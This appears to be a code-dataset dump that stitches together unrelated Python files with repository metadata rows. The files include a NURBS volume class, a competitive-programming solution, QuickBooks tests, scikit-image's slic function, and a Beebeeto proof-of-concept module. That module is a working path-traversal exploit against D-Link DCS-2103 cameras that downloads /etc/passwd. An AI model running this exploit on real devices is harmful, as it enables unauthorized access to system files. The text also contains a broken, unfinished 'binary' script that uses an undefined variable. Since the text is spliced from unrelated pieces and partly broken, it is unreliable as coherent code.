raise ValueError("Set degree and control points first on the v-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_v, value, self.ctrlpts_size_v):
raise ValueError("Input is not a valid knot vector on the v-direction")
# Clean up the surface points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[1] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def knotvector_w(self):
""" Knot vector for the w-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the w-direction
:setter: Sets knot vector for the w-direction
:type: list
"""
return self._knot_vector[2]
@knotvector_w.setter
def knotvector_w(self, value):
if self.degree_w == 0 or self.ctrlpts_size_w == 0:
raise ValueError("Set degree and control points first for the w-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_w, value, self.ctrlpts_size_w):
raise ValueError("Input is not a valid knot vector for the w-direction")
# Clean up the surface points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[2] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def ctrlpts(self):
""" 1-dimensional array of control points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
if self.ctrlpts_size_u <= 0 or self.ctrlpts_size_v <= 0 or self.ctrlpts_size_w <= 0:
raise ValueError("Please set the number of control points on the u-, v- and w-directions")
self.set_ctrlpts(value, self.ctrlpts_size_u, self.ctrlpts_size_v, self.ctrlpts_size_w)
@property
def ctrlpts_size_u(self):
""" Number of control points for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the u-direction
:setter: Sets number of control points for the u-direction
"""
return self._control_points_size[0]
@ctrlpts_size_u.setter
def ctrlpts_size_u(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the u-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[0] = value
@property
def ctrlpts_size_v(self):
""" Number of control points for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the v-direction
:setter: Sets number of control points for the v-direction
"""
return self._control_points_size[1]
@ctrlpts_size_v.setter
def ctrlpts_size_v(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the v-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[1] = value
@property
def ctrlpts_size_w(self):
""" Number of control points for the w-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the w-direction
:setter: Sets number of control points for the w-direction
"""
return self._control_points_size[2]
@ctrlpts_size_w.setter
def ctrlpts_size_w(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the w-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[2] = value
@property
def sample_size_u(self):
""" Sample size for the u-direction.
Sample size defines the number of evaluated points to generate. It also sets the ``delta_u`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the u-direction
:setter: Sets sample size for the u-direction
:type: int
"""
return int(1.0 / self.delta_u) + 1
@sample_size_u.setter
def sample_size_u(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0:
warnings.warn("Cannot determine 'delta_u' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u + 1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
@property
def sample_size_v(self):
""" Sample size for the v-direction.
Sample size defines the number of evaluated points to generate. It also sets the ``delta_v`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the v-direction
:setter: Sets sample size for the v-direction
:type: int
"""
return int(1.0 / self.delta_v) + 1
@sample_size_v.setter
def sample_size_v(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_v is None or len(self.knotvector_v) == 0) or self.degree_v == 0:
warnings.warn("Cannot determine 'delta_v' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v + 1)]
# Set delta values
self.delta_v = (stop_v - start_v) / float(value - 1)
@property
def sample_size_w(self):
""" Sample size for the w-direction.
Sample size defines the number of evaluated points to generate. It also sets the ``delta_w`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the w-direction
:setter: Sets sample size for the w-direction
:type: int
"""
return int(1.0 / self.delta_w) + 1
@sample_size_w.setter
def sample_size_w(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_w is None or len(self.knotvector_w) == 0) or self.degree_w == 0:
warnings.warn("Cannot determine 'delta_w' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_w = self.knotvector_w[self.degree_w]
stop_w = self.knotvector_w[-(self.degree_w + 1)]
# Set delta values
self.delta_w = (stop_w - start_w) / float(value - 1)
@property
def sample_size(self):
""" Sample size for both u- and v-directions.
Sample size defines the number of surface points to generate. It also sets the ``delta`` property.
The following figure illustrates the working principles of sample size property:
.. math::
\\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}}
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size as a tuple of values corresponding to u-, v- and w-directions
:setter: Sets sample size value for both u-, v- and w-directions
:type: int
"""
sample_size_u = int(1.0 / self.delta_u) + 1
sample_size_v = int(1.0 / self.delta_v) + 1
sample_size_w = int(1.0 / self.delta_w) + 1
return sample_size_u, sample_size_v, sample_size_w
@sample_size.setter
def sample_size(self, value):
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0 or \
(self.knotvector_v is None or len(self.knotvector_v) == 0 or self.degree_v == 0) or \
(self.knotvector_w is None or len(self.knotvector_w) == 0 or self.degree_w == 0):
warnings.warn("Cannot determine 'delta' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u + 1)]
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v + 1)]
start_w = self.knotvector_w[self.degree_w]
stop_w = self.knotvector_w[-(self.degree_w + 1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
self.delta_v = (stop_v - start_v) / float(value - 1)
self.delta_w = (stop_w - start_w) / float(value - 1)
@property
def delta_u(self):
""" Evaluation delta for the u-direction.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
Therefore; smaller the delta value, smoother the surface.
Please note that ``delta_u`` and ``sample_size_u`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_u`` will also set ``sample_size_u``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the u-direction
:setter: Sets evaluation delta for the u-direction
:type: float
"""
return self._delta[0]
@delta_u.setter
def delta_u(self, value):
# Delta value should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Evaluation delta (u-direction) must be between 0.0 and 1.0")
# Clean up evaluated points
self.reset(evalpts=True)
# Set new delta value
self._delta[0] = float(value)
@property
def delta_v(self):
""" Evaluation delta for the v-direction.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
Therefore; smaller the delta value, smoother the surface.
Please note that ``delta_v`` and ``sample_size_v`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_v`` will also set ``sample_size_v``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the v-direction
:setter: Sets evaluation delta for the v-direction
:type: float
"""
return self._delta[1]
@delta_v.setter
def delta_v(self, value):
# Delta value should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Evaluation delta (v-direction) should be between 0.0 and 1.0")
# Clean up evaluated points
self.reset(evalpts=True)
# Set new delta value
self._delta[1] = float(value)
@property
def delta_w(self):
""" Evaluation delta for the w-direction.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
Therefore; smaller the delta value, smoother the surface.
Please note that ``delta_w`` and ``sample_size_w`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_w`` will also set ``sample_size_w``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the w-direction
:setter: Sets evaluation delta for the w-direction
:type: float
"""
return self._delta[2]
@delta_w.setter
def delta_w(self, value):
# Delta value should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Evaluation delta (w-direction) should be between 0.0 and 1.0")
# Clean up evaluated points
self.reset(evalpts=True)
# Set new delta value
self._delta[2] = float(value)
@property
def delta(self):
""" Evaluation delta for u-, v- and w-directions.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
Therefore; smaller the delta value, smoother the surface.
Please note that ``delta`` and ``sample_size`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta`` will also set ``sample_size``.
The following figure illustrates the working principles of the delta property:
.. math::
\\left[{{u_{0}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right]
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta as a tuple of values corresponding to u-, v- and w-directions
:setter: Sets evaluation delta for u-, v- and w-directions
:type: float
"""
return self.delta_u, self.delta_v, self.delta_w
@delta.setter
def delta(self, value):
if isinstance(value, (int, float)):
self.delta_u = value
self.delta_v = value
self.delta_w = value
elif isinstance(value, (list, tuple)):
if len(value) == 3:
self.delta_u = value[0]
self.delta_v = value[1]
self.delta_w = value[2]
else:
raise ValueError("Surface requires 3 delta values")
else:
raise ValueError("Cannot set delta. Please input a numeric value or a list or tuple with 3 numeric values")
@property
def data(self):
""" Returns a dictionary containing all shape data.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
"""
return dict(
rational=self.rational,
dimension=self.dimension,
degree=self._degree,
knotvector=self._knot_vector,
size=self._control_points_size,
control_points=self._control_points
)
def reset(self, **kwargs):
""" Resets control points and/or evaluated points.
Keyword Arguments:
* ``evalpts``: if True, then resets evaluated points
* ``ctrlpts`` if True, then resets control points
"""
reset_ctrlpts = kwargs.get('ctrlpts', False)
reset_evalpts = kwargs.get('evalpts', False)
if reset_ctrlpts:
self._control_points = self._init_array()
self._control_points_size = [0, 0, 0]
self._bounding_box = self._init_array()
if reset_evalpts:
self._eval_points = self._init_array()
def _check_variables(self):
""" Checks whether the evaluation is possible or not. """
works = True
param_list = []
if self.degree_u == 0:
works = False
param_list.append('degree_u')
if self.degree_v == 0:
works = False
param_list.append('degree_v')
if self.degree_w == 0:
works = False
param_list.append('degree_w')
if self._control_points is None or len(self._control_points) == 0:
works = False
param_list.append('ctrlpts')
if self.knotvector_u is None or len(self.knotvector_u) == 0:
works = False
param_list.append('knotvector_u')
if self.knotvector_v is None or len(self.knotvector_v) == 0:
works = False
param_list.append('knotvector_v')
if self.knotvector_w is None or len(self.knotvector_w) == 0:
works = False
param_list.append('knotvector_w')
if not works:
raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list))
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets the control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
:param args: number of control points corresponding to each parametric dimension
:type args: tuple[int, int, int]
"""
# Validate input
for arg, degree in zip(args, self._degree):
if degree <= 0:
raise ValueError("Set the degree first")
if arg < degree + 1:
raise ValueError("Number of control points should be at least degree + 1")
# Clean up the surface and control points
self.reset(evalpts=True, ctrlpts=True)
# Call parent function
super(Volume, self).set_ctrlpts(ctrlpts, *args, **kwargs)
def render(self, **kwargs):
""" Renders the volume using the visualization component.
The visualization component must be set using :py:attr:`~vis` property before calling this method.
Keyword Arguments:
* ``cpcolor``: sets the color of the control points
* ``evalcolor``: sets the color of the volume
* ``filename``: saves the plot with the input name
* ``plot``: controls plot window visibility. *Default: True*
* ``animate``: activates animation (if supported). *Default: False*
* ``grid_size``: grid size for voxelization. *Default: (16, 16, 16)*
* ``use_mp``: flag to activate multi-threaded voxelization. *Default: False*
* ``num_procs``: number of concurrent processes for multi-threaded voxelization. *Default: 4*
The ``plot`` argument is useful when you would like to work on the command line without any window context.
If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables
plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the
configuration class.
``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts
in the format described below:
.. code-block:: python
:linenos:
[
dict( # line plot 1
points=[[1, 2, 3], [4, 5, 6]], # list of points
name="My line Plot 1", # name displayed on the legend
color="red", # color of the line plot
size=6.5 # size of the line plot
),
dict( # line plot 2
points=[[7, 8, 9], [10, 11, 12]], # list of points
name="My line Plot 2", # name displayed on the legend
color="navy", # color of the line plot
size=12.5 # size of the line plot
)
]
"""
if not self._vis_component:
warnings.warn("No visualization component has been set")
return
cpcolor = kwargs.get('cpcolor', 'blue')
evalcolor = kwargs.get('evalcolor', 'green')
bboxcolor = kwargs.get('bboxcolor', 'darkorange')
filename = kwargs.get('filename', None)
plot_visible = kwargs.get('plot', True)
extra_plots = kwargs.get('extras', None)
animate_plot = kwargs.get('animate', False)
# Check all parameters are set
self._check_variables()
# Check if the volume has been evaluated
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
# Clear the visualization component
self._vis_component.clear()
# Add control points
if self._vis_component.mconf['ctrlpts'] == 'points':
self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add evaluated points
if self._vis_component.mconf['evalpts'] == 'points':
self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts')
# Add evaluated points as voxels
if self._vis_component.mconf['evalpts'] == 'voxels':
grid, filled = voxelize.voxelize(self, **kwargs)
polygrid = voxelize.convert_bb_to_faces(grid)
self._vis_component.add(ptsarr=[polygrid, filled], name=self.name, color=evalcolor, plot_type='evalpts')
# Bounding box
self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox')
# User-defined plots
if extra_plots is not None:
for ep in extra_plots:
self._vis_component.add(ptsarr=ep['points'], name=ep['name'],
color=(ep['color'], ep['size']), plot_type='extras')
# Data requested by the visualization module
if self._vis_component.mconf['others']:
vis_other = self._vis_component.mconf['others'].split(",")
for vo in vis_other:
vo_clean = vo.strip()
# Send center point of the parametric space to the visualization module
if vo_clean == "midpt":
midprm_u = (max(self.knotvector_u) + min(self.knotvector_u)) / 2.0
midprm_v = (max(self.knotvector_v) + min(self.knotvector_v)) / 2.0
midprm_w = (max(self.knotvector_w) + min(self.knotvector_w)) / 2.0
midpt = self.evaluate_single((midprm_u, midprm_v, midprm_w))
self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean)
# Display the figure
if animate_plot:
self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible)
else:
self._vis_component.render(fig_save_as=filename, display_plot=plot_visible)
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Evaluates the parametric volume.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def evaluate_single(self, param):
""" Evaluates the parametric surface at the given (u, v, w) parameter.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param: parameter pair (u, v, w)
"""
# Check all parameters are set before the evaluation
self._check_variables()
if isinstance(param, (int, float)):
param = [float(param) for _ in range(self.pdimension)]
# Check parameters
if self._kv_normalize:
if not utilities.check_params(param):
raise GeomdlException("Parameters should be between 0 and 1")
@abc.abstractmethod
def evaluate_list(self, param_list):
""" Evaluates the parametric volume for an input range of (u, v, w) parameter pairs.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param_list: array of parameter pairs (u, v, w)
"""
# Check all parameters are set before the evaluation
self._check_variables()
| [
"[email protected]"
] | |
720fea823a41bf05eb6a14e1f940971f38e10095 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0149.py | ff203f0727674fb7a8ebff1da4a637af1da4eb49 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2014-0149',
'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi 任意文件下载漏洞 Exploit',
'author': 'foundu',
'create_date': '2014-11-19',
},
# 协议相关信息
'protocol': {
'name': 'http',
'port': [80],
'layer4_protocol': ['tcp'],
},
# 漏洞相关信息
'vul': {
'app_name': 'D-Link',
'vul_version': 'DCS-2103',
'type': 'Arbitrary File Download',
'tag': ['D-Link漏洞', '任意文件下载漏洞', '/cgi-bin/sddownload.cgi', 'cgi'],
'desc': '''
Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.
I found these vulnerabilities at 11.07.2014 and later informed D-Link. But
they haven't answered. It looks like they are busy with fixing
vulnerabilities in DAP-1360, which I wrote about earlier.
''',
'references': ['http://www.intelligentexploit.com/view-details.html?id=20197',
]
},
}
@classmethod
def exploit(cls, args):
payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd'
verify_url = args['options']['target'] + payload
req = urllib2.Request(verify_url)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
content = urllib2.urlopen(req).read()
if 'root:' in content and 'nobody:' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['passwd'] = content
return args
verify = exploit
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run()) | [
"[email protected]"
] | |
eead8a129c8bd1f58b1499653bdbfad5e2d62157 | 526bf18a8695862067c817f432ab197ceb645f39 | /scrappers/cars/getautofinance/hwy11ram/__init__.py | c8fffab15b7e28ff8f73e39f28b1f956fcff4a4e | [] | no_license | sintimaski/bfs-be | a7fd623911a2220face49a0ef84574f3fd7a09a8 | 964a9c7e9cc876aaf8b0723d6b3f26bd378c3721 | refs/heads/master | 2023-08-02T09:00:44.855055 | 2021-09-22T13:07:01 | 2021-09-22T13:07:01 | 339,531,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | from .hwy11ram import Hwy11RamScrapper
| [
"[email protected]"
] | |
21c0cebb2546807a8dd223104a08e5e29d58ec7c | 62766deea531d0b89b86a53e6f51b94fd2a88f23 | /AtCoder/ABC/131/c.py | fbe2beb18aab0fad58d1c7599493260ae7b68225 | [
"MIT"
] | permissive | ttyskg/ProgrammingCompetition | 53620b07317ae5cbd1ee06272e573e3682ac15f3 | 885c5a1be228ae7ba9f00b3d63521c9ff7d21608 | refs/heads/master | 2023-08-18T08:38:33.068168 | 2023-08-15T04:28:13 | 2023-08-15T04:28:13 | 183,425,786 | 0 | 0 | MIT | 2023-08-15T04:28:14 | 2019-04-25T12:02:53 | Python | UTF-8 | Python | false | false | 476 | py | import sys
def gcd(a, b):
"""Euclidean Algorithm"""
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return (a * b) // gcd(a, b)
def main():
input = sys.stdin.readline
A, B, C, D = map(int, input().split())
E = lcm(C, D)
total = B - (A-1)
mul_c = B // C - (A-1) // C
mul_d = B // D - (A-1) // D
mul_e = B // E - (A-1) // E
return total - (mul_c + mul_d - mul_e)
if __name__ == '__main__':
print(main())
| [
"[email protected]"
] | |
889b22757513884a8c6c50f0b76bbe2c55a22845 | b515ebbe9b259cf8cc11bae3eb2cd9094d9dac80 | /tests/integration/test_base.py | 09c270270007ae701dc6d64c0735eb0fe39714a5 | [
"MIT",
"Python-2.0"
] | permissive | cambiumproject/python-quickbooks | a234e29555e37399f53a9909cf4c3cf61e9e7bc1 | 06110a4a88bb47b2e6349a193908c083d506dde1 | refs/heads/master | 2023-08-07T20:15:14.600671 | 2021-07-20T21:53:59 | 2021-07-20T21:53:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | import os
from unittest import TestCase
from intuitlib.client import AuthClient
from quickbooks.client import QuickBooks, Environments
class QuickbooksTestCase(TestCase):
def setUp(self):
super(QuickbooksTestCase, self).setUp()
self.auth_client = AuthClient(
client_id=os.environ.get('CLIENT_ID'),
client_secret=os.environ.get('CLIENT_SECRET'),
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
minorversion=59,
auth_client=self.auth_client,
refresh_token=os.environ.get('REFRESH_TOKEN'),
company_id=os.environ.get('COMPANY_ID'),
)
self.qb_client.sandbox = True
class QuickbooksUnitTestCase(TestCase):
def setUp(self):
super(QuickbooksUnitTestCase, self).setUp()
self.auth_client = AuthClient(
client_id='CLIENTID',
client_secret='CLIENT_SECRET',
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
#auth_client=self.auth_client,
refresh_token='REFRESH_TOKEN',
company_id='COMPANY_ID',
)
self.qb_client.sandbox = True
| [
"[email protected]"
] | |
843d5c4d45fddd036ed5fa1783b168dbde9b6640 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/binary_20200524140021.py | cad576ae530c25621bd03b09d3d763a13dba320b | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | def solution(N):
print(N)
maximumCount = 0
well = format(9,"b")
print("wow",well)
# while( N >= 1):
# N = int(N / 2)
# # print("this",N)
# print("N",N/2,"well",N%2)
# if N % 2 == 0 :
# binaryNumber.append(0)
# else:
# binaryNumber.append(1)
# then reverse the number
s = [str(i) for i in well]
binary = int("".join(s))
intialNumber = None
lastNumber = None
totalCount = 0
print("binary",str(binary))
print("number",number)
for i in range(len(str(binary))):
if number[i] == 1:
intialNumber = 1
if i < len(number)-1:
if number[i] == 0 and number[i+1] :
lastNumber = 1
if intialNumber is not None and lastNumber is not None and number[i] == 0:
maximumCount = maximumCount + 1
else:
totalCount = maximumCount
maximumCount = 0
# return 0
print("total",totalCount)
solution(9) | [
"[email protected]"
] | |
efd20d62075642d05d33586f9a2f19037598aa02 | ee41311a11a1c6baedafd9a914d5a1f8330fe8a9 | /SANEF_LIVE/venv/Lib/site-packages/skimage/segmentation/slic_superpixels.py | b196dbffc726dfb4cbf2e1da2a6e255d3901f1ec | [] | no_license | sethnanati/CodeRepoPython | 2dffb7263620bd905bf694f348485d894a9513db | b55e66611d19b35e9926d1b1387320cf48e177c8 | refs/heads/master | 2023-07-07T11:16:12.958401 | 2021-02-13T10:09:48 | 2021-02-13T10:09:48 | 376,531,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,799 | py | # coding=utf-8
from __future__ import division
import collections as coll
import numpy as np
from scipy import ndimage as ndi
from ..util import img_as_float, regular_grid
from ..segmentation._slic import (_slic_cython,
_enforce_label_connectivity_cython)
from ..color import rgb2lab
def slic(image, n_segments=100, compactness=10., max_iter=10, sigma=0,
spacing=None, multichannel=True, convert2lab=None,
enforce_connectivity=True, min_size_factor=0.5, max_size_factor=3,
slic_zero=False):
"""Segments image using k-means clustering in Color-(x,y,z) space.
Parameters
----------
image : 2D, 3D or 4D ndarray
Input image, which can be 2D or 3D, and grayscale or multichannel
(see `multichannel` parameter).
n_segments : int, optional
The (approximate) number of labels in the segmented output image.
compactness : float, optional
Balances color proximity and space proximity. Higher values give
more weight to space proximity, making superpixel shapes more
square/cubic. In SLICO mode, this is the initial compactness.
This parameter depends strongly on image contrast and on the
shapes of objects in the image. We recommend exploring possible
values on a log scale, e.g., 0.01, 0.1, 1, 10, 100, before
refining around a chosen value.
max_iter : int, optional
Maximum number of iterations of k-means.
sigma : float or (3,) array-like of floats, optional
Width of Gaussian smoothing kernel for pre-processing for each
dimension of the image. The same sigma is applied to each dimension in
case of a scalar value. Zero means no smoothing.
Note, that `sigma` is automatically scaled if it is scalar and a
manual voxel spacing is provided (see Notes section).
spacing : (3,) array-like of floats, optional
The voxel spacing along each image dimension. By default, `slic`
assumes uniform spacing (same voxel resolution along z, y and x).
This parameter controls the weights of the distances along z, y,
and x during k-means clustering.
multichannel : bool, optional
Whether the last axis of the image is to be interpreted as multiple
channels or another spatial dimension.
convert2lab : bool, optional
Whether the input should be converted to Lab colorspace prior to
segmentation. The input image *must* be RGB. Highly recommended.
This option defaults to ``True`` when ``multichannel=True`` *and*
``image.shape[-1] == 3``.
enforce_connectivity: bool, optional
Whether the generated segments are connected or not
min_size_factor: float, optional
Proportion of the minimum segment size to be removed with respect
to the supposed segment size ```depth*width*height/n_segments```
max_size_factor: float, optional
Proportion of the maximum connected segment size. A value of 3 works
in most of the cases.
slic_zero: bool, optional
Run SLIC-zero, the zero-parameter mode of SLIC. [2]_
Returns
-------
labels : 2D or 3D array
Integer mask indicating segment labels.
Raises
------
ValueError
If ``convert2lab`` is set to ``True`` but the last array
dimension is not of length 3.
Notes
-----
* If `sigma > 0`, the image is smoothed using a Gaussian kernel prior to
segmentation.
* If `sigma` is scalar and `spacing` is provided, the kernel width is
divided along each dimension by the spacing. For example, if ``sigma=1``
and ``spacing=[5, 1, 1]``, the effective `sigma` is ``[0.2, 1, 1]``. This
ensures sensible smoothing for anisotropic images.
* The image is rescaled to be in [0, 1] prior to processing.
* Images of shape (M, N, 3) are interpreted as 2D RGB images by default. To
interpret them as 3D with the last dimension having length 3, use
`multichannel=False`.
References
----------
.. [1] Radhakrishna Achanta, Appu Shaji, Kevin Smith, Aurelien Lucchi,
Pascal Fua, and Sabine Süsstrunk, SLIC Superpixels Compared to
State-of-the-art Superpixel Methods, TPAMI, May 2012.
.. [2] http://ivrg.epfl.ch/research/superpixels#SLICO
Examples
--------
>>> from skimage.segmentation import slic
>>> from skimage.data import astronaut
>>> img = astronaut()
>>> segments = slic(img, n_segments=100, compactness=10)
Increasing the compactness parameter yields more square regions:
>>> segments = slic(img, n_segments=100, compactness=20)
"""
image = img_as_float(image)
is_2d = False
if image.ndim == 2:
# 2D grayscale image
image = image[np.newaxis, ..., np.newaxis]
is_2d = True
elif image.ndim == 3 and multichannel:
# Make 2D multichannel image 3D with depth = 1
image = image[np.newaxis, ...]
is_2d = True
elif image.ndim == 3 and not multichannel:
# Add channel as single last dimension
image = image[..., np.newaxis]
if spacing is None:
spacing = np.ones(3)
elif isinstance(spacing, (list, tuple)):
spacing = np.array(spacing, dtype=np.double)
if not isinstance(sigma, coll.Iterable):
sigma = np.array([sigma, sigma, sigma], dtype=np.double)
sigma /= spacing.astype(np.double)
elif isinstance(sigma, (list, tuple)):
sigma = np.array(sigma, dtype=np.double)
if (sigma > 0).any():
# add zero smoothing for multichannel dimension
sigma = list(sigma) + [0]
image = ndi.gaussian_filter(image, sigma)
if multichannel and (convert2lab or convert2lab is None):
if image.shape[-1] != 3 and convert2lab:
raise ValueError("Lab colorspace conversion requires a RGB image.")
elif image.shape[-1] == 3:
image = rgb2lab(image)
depth, height, width = image.shape[:3]
# initialize cluster centroids for desired number of segments
grid_z, grid_y, grid_x = np.mgrid[:depth, :height, :width]
slices = regular_grid(image.shape[:3], n_segments)
step_z, step_y, step_x = [int(s.step if s.step is not None else 1)
for s in slices]
segments_z = grid_z[slices]
segments_y = grid_y[slices]
segments_x = grid_x[slices]
segments_color = np.zeros(segments_z.shape + (image.shape[3],))
segments = np.concatenate([segments_z[..., np.newaxis],
segments_y[..., np.newaxis],
